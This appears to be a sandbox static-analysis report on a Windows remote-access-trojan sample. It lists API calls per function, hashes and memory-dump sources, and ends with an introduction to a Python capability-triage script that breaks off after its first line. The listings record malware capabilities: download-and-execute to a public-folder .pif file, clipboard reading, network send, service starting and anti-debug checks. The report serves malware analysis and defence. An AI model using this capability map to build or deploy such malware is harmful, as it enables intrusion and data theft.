• API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
• String ID: SeShutdownPrivilege
• API String ID: 3534403312-3733053543
• Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
• Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
• Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
• Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00409258
                                                                                                                                                                      • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                                                                                                                                                      • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 004093C1
                                                                                                                                                                      • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                                                                                      • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                                                                                      • Part of subcall function 00404E26: FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 004095B9
                                                                                                                                                                      • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                                                                                      • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Find$Close$EventFileObjectSingleWait$ChangeException@8FirstH_prologNextNotificationThrowconnectsend
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2435342581-0
                                                                                                                                                                    • Opcode ID: 3bbaf31890dd6242682e5e07faa201dc08710538f861cb005962278dfb94d46e
                                                                                                                                                                    • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                                                                                                                                                    • Opcode Fuzzy Hash: 3bbaf31890dd6242682e5e07faa201dc08710538f861cb005962278dfb94d46e
                                                                                                                                                                    • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                                                                                                                                                    • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 276877138-0
                                                                                                                                                                    • Opcode ID: 38ff3efd75794608fc7efc6ab14161dff6b0215efc9cafdd27725548e5e732cb
                                                                                                                                                                    • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                                                                                                                                                    • Opcode Fuzzy Hash: 38ff3efd75794608fc7efc6ab14161dff6b0215efc9cafdd27725548e5e732cb
                                                                                                                                                                    • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 004524D5
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 004524FE
                                                                                                                                                                    • GetACP.KERNEL32 ref: 00452513
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                                                                    • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                                                                                                                                    • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                                                                                                                                                    • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                                                                                                                                    • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                                                                                                                                                                    • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                                                                                                                                                    • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                                                                                                                                                    • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                    • String ID: SETTINGS
                                                                                                                                                                    • API String ID: 3473537107-594951305
                                                                                                                                                                    • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                                                                                                                                    • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                                                                                                                                                    • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                                                                                                                                    • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0040966A
                                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                                                                                                                                                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1157919129-0
                                                                                                                                                                    • Opcode ID: aab8e92aab89f970816b537945c8c112a0cd0b9269506920a05a315ce3e12cbc
                                                                                                                                                                    • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                                                                                                                                                    • Opcode Fuzzy Hash: aab8e92aab89f970816b537945c8c112a0cd0b9269506920a05a315ce3e12cbc
                                                                                                                                                                    • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                                                                                                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                                                                                                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                                                                                                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                                                                                                                      • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                                                                                                                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                                                                                                                                    • GetUserDefaultLCID.KERNEL32 ref: 0045271C
                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                                                                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 004527ED
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                     • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 745075371-0
                                                                                                                                                                    • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                                                                                                                                                    • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                                                                                                                                                                    • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                                                                                                                                                    • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00408811
• FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
• __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
• FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
• FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Similarity
• API ID: Find$File$CloseException@8FirstH_prologNextThrow
• String ID:
• API String ID: 1771804793-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
• URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
Memory Dump Source
• Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
Similarity
• API ID: DownloadExecuteFileShell
• String ID: C:\Users\Public\Libraries\lhgtogaW.pif$open
• API String ID: 2825088817-2145912792
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
• FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Similarity
• API ID: FileFind$FirstNextsend
• String ID: XPG$XPG
• API String ID: 4113138495-1962359302
Uniqueness
Uniqueness Score: -1.00%

APIs
• SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
  • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
  • Part of subcall function 0041376F: RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137A6
  • Part of subcall function 0041376F: RegCloseKey.KERNEL32(?,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137B1
Memory Dump Source
• Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
Similarity
• API ID: CloseCreateInfoParametersSystemValue
• String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
• API String ID: 4127273184-3576401099
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
• IsValidCodePage.KERNEL32(00000000), ref: 00451DBA
• _wcschr.LIBVCRUNTIME ref: 00451E4A
• _wcschr.LIBVCRUNTIME ref: 00451E58
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00451EFB
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Similarity
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
• String ID:
• API String ID: 4212172061-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 004493BD
  • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
• GetTimeZoneInformation.KERNEL32 ref: 004493CF
• WideCharToMultiByte.KERNEL32(00000000,?,00472764,000000FF,?,0000003F,?,?), ref: 00449447
• WideCharToMultiByte.KERNEL32(00000000,?,004727B8,000000FF,?,0000003F,?,?,?,00472764,000000FF,?,0000003F,?,?), ref: 00449474
Memory Dump Source
• Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
• String ID:
• API String ID: 806657224-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• IsDebuggerPresent.KERNEL32 ref: 0043BC1A
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC24
• UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
Memory Dump Source
• Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
                                                                                                                                                                    • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                                                                                                                                                    • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                                                                                                                                                                    • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                                                                                                                                                    • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 274C61DA
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 274C61E4
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 274C61F1
Memory Dump Source
• Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
• Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 78c78fbf3cffd025009e3e2756e5a66da325dcfc268cff912a2151c833be947d
• Instruction ID: 1c4f0a0c929ad86b783970387c797a1a5e574e889b482f5411d1d69b69619534
• Opcode Fuzzy Hash: 78c78fbf3cffd025009e3e2756e5a66da325dcfc268cff912a2151c833be947d
• Instruction Fuzzy Hash: 1D31D37490122CDBCB21DF29D9897CDBBB8AF48710F5081EEE81CA7250EB749B818F45
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32(?,?,0044328B,?), ref: 004432D6
• TerminateProcess.KERNEL32(00000000,?,0044328B,?), ref: 004432DD
• ExitProcess.KERNEL32 ref: 004432EF
Memory Dump Source
• Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
• Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
• Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
• Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32(?,?,274C4A8A,?,274D2238,0000000C,274C4BBD,00000000,00000000,00000001,274C2082,274D2108,0000000C,274C1F3A,?), ref: 274C4AD5
• TerminateProcess.KERNEL32(00000000,?,274C4A8A,?,274D2238,0000000C,274C4BBD,00000000,00000000,00000001,274C2082,274D2108,0000000C,274C1F3A,?), ref: 274C4ADC
• ExitProcess.KERNEL32 ref: 274C4AEE
Memory Dump Source
• Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
• Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 971b6853a8a05b962e3071e457bb5712d8a5f03245adcc5ec30dbf35d5c4ddcc
• Instruction ID: 6c8c24f599db5fa335909f014e76e4564b971ace7e4a13dd24c06fc612feeb60
• Opcode Fuzzy Hash: 971b6853a8a05b962e3071e457bb5712d8a5f03245adcc5ec30dbf35d5c4ddcc
• Instruction Fuzzy Hash: 03E0BF39000204EFDF02AF5ACE09A993F69FF40745B50401CF90557121DF39D993CA55
Uniqueness
Uniqueness Score: -1.00%

APIs
• OpenClipboard.USER32(00000000), ref: 0040B711
• GetClipboardData.USER32(0000000D), ref: 0040B71D
• CloseClipboard.USER32 ref: 0040B725
Memory Dump Source
• Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Clipboard$CloseDataOpen
• String ID:
• API String ID: 2058664381-0
• Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
• Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
• Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
• Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
Uniqueness
Uniqueness Score: -1.00%

APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434C6B
Memory Dump Source
• Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
• Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
• Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
• Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
• Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0043487A), ref: 00434B4C
Memory Dump Source
• Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
• Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
• Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
• Instruction Fuzzy Hash:
Uniqueness
Uniqueness Score: -1.00%

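The per-function API listings above are the raw material for capability triage, and they are worth reading with some care: the same three-call sequences recur in both the 0x400000 image and the 0x274C0000 region, and not every one of them is malicious. IsDebuggerPresent / SetUnhandledExceptionFilter / UnhandledExceptionFilter and GetCurrentProcess / TerminateProcess / ExitProcess are the MSVC C runtime's fault-report and abort paths and appear in benign binaries as well, whereas OpenClipboard / GetClipboardData(0000000D, that is CF_UNICODETEXT) / CloseClipboard is a clipboard-read primitive. The Python script below is an added example, not part of the Joe Sandbox report and not Remcos or DBatLoader code: it parses listing lines in the report's own format (the SAMPLE string is constructed from four listings on this page), groups the calls per function and tags each function against a small capability table whose entries and confidence labels are this example's own judgment. The screen-capture entry in that table generalizes beyond the listings shown above it.

```python
import re

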